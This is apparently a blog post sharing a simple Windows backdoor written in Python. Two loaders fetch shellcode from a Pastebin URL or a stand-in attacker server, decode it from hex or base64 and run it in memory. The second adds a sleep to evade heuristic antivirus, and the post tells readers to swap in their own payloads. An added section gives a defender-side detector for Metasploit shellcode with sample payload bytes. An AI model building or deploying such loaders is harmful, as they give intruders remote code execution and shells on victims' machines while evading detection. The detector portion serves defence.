Super Easy Ghetto Pastebin Malware

The following is a very simple backdoor I created in Python and compiled into a Windows binary using PyInstaller. The code downloads ASCII-hex shellcode from a Pastebin raw URL, decodes the hex into raw bytes, copies them into a memory buffer, and executes them, never writing the payload to disk.

(I'm aware how primitive this is, but it got the job done)

Simply upload your shellcode to Pastebin, change the URL in the source code, and compile. The shellcode should be a plain hex string, two ASCII hex digits per byte, with line breaks allowed (the loader strips them), as follows:

```python
#!/usr/bin/python

from ctypes import *
from urllib2 import urlopen   # urlopen must actually be imported, not just urllib2

URL = "http://pastebin.com/raw.php?i=48k0BXpq" # msfpayload windows/shell/bind_tcp LPORT=4444
# modify that URL for whatever shellcode you want

downloader = urlopen(URL)                     # fetch the raw paste body
paste = downloader.read()
alphanumeric = paste.replace("\r\n", "")      # drop the line breaks Pastebin inserts
shellcode = str(bytearray.fromhex(alphanumeric))  # hex text -> raw bytes (create_string_buffer wants a str, not a bytearray)
array = create_string_buffer(shellcode, len(shellcode))  # copy the bytes into a ctypes buffer
shell = cast(array, CFUNCTYPE(c_void_p))      # treat the buffer as a function taking no arguments
shell()                                       # call it
```

*see the links at the bottom for the source repository

I wrote another version of this script that downloads the raw shellcode data from a server that you specify, in case your target blocks Pastebin. I added base64 support and a sleep to outwait certain heuristic engines.

```python
#!/usr/bin/python

from ctypes import *
from base64 import b64decode
from urllib import urlopen
from time import sleep

URL = "http://server.com/evil.b64" # This should be changed to wherever you are hosting your malware package

downloader = urlopen(URL) # download the package
shellcode = b64decode(downloader.read()) # de-base64 the shellcode
sleep(31) # avoid time-based heuristics
array = create_string_buffer(shellcode, len(shellcode))
shell = cast(array, CFUNCTYPE(c_void_p))
shell()
```
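As an added defender-side example (not part of the post or its repositories): a Python 3 check that inspects a fetched paste or HTTP body the way the two loaders decode it (CRLF-stripped hex, or base64) and flags bodies that decode to the 15-byte API-resolver prologue that Metasploit's x86 Windows payloads, such as the msfpayload bind_tcp stub used above, begin with. The sample paste bodies are constructed, and the function names are my own.

```python
"""Added defender-side check: inspect a fetched paste/HTTP body the way the two
loaders decode it (CRLF-stripped hex, or base64) and flag the MSF x86 prologue."""
import base64
import binascii
import re

# cld; call <block_api>; pushad; mov ebp,esp; xor edx,edx; mov edx,fs:[edx+0x30]
# The call displacement (3rd byte) differs between payload versions, so it is
# wildcarded; the other 14 bytes are fixed in msfpayload/msfvenom x86 output.
MSF_X86_PROLOGUE = re.compile(
    rb"\xfc\xe8.\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30", re.DOTALL)


def candidate_decodings(body: bytes) -> list:
    """Mirror the loaders: strip whitespace, then try hex and base64 decoding.
    Returns [(label, decoded_bytes), ...]; the raw body is kept as well so an
    unencoded blob is caught too."""
    compact = re.sub(rb"\s+", b"", body)
    out = [("raw", body)]
    if compact and len(compact) % 2 == 0 and re.fullmatch(rb"[0-9a-fA-F]+", compact):
        out.append(("hex", binascii.unhexlify(compact)))
    try:
        decoded = base64.b64decode(compact, validate=True)
        if decoded:
            out.append(("base64", decoded))
    except (binascii.Error, ValueError):
        pass
    return out


def scan_body(body: bytes) -> dict:
    """Verdict a proxy or sandbox rule can act on: whether the MSF prologue was
    found, under which decoding, and at what byte offset in the decoded blob."""
    for label, blob in candidate_decodings(body):
        hit = MSF_X86_PROLOGUE.search(blob)
        if hit:
            return {"match": True, "encoding": label, "offset": hit.start(),
                    "decoded_len": len(blob)}
    return {"match": False}


# Constructed sample bodies (not real pastes): the first 30 bytes of an msfpayload
# x86 bind_tcp stub as Pastebin-style hex lines, the same bytes base64-encoded as
# the second loader expects, and a benign hex paste.
HEX_PASTE = b"fce8890000006089e531d2648b5230\r\n8b520c8b52148b72280fb74a2631ff\r\n"
B64_PASTE = base64.b64encode(bytes.fromhex(HEX_PASTE.replace(b"\r\n", b"").decode()))
BENIGN_PASTE = b"deadbeef\r\ncafebabe\r\n"

if __name__ == "__main__":
    for name, body in (("hex", HEX_PASTE), ("b64", B64_PASTE), ("benign", BENIGN_PASTE)):
        print(name, scan_body(body))
```

The same check can be run on a proxy's cached response bodies for pastebin.com/raw.php fetches, which is the network indicator both loaders share.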

This is not advanced, but it is effective.

Feel free to extend and modify this to fit your needs.

*Big thanks to TJ O'Connor for writing Violent Python. I highly recommend it to everyone. I took the shellcode casting portion of this code straight from his book.

Links:
PyInstaller - http://www.pyinstaller.org/
Stupid Malware - https://github.com/andrew-morris/stupid_malware
Shell Paste - https://github.com/andrew-morris/shellpaste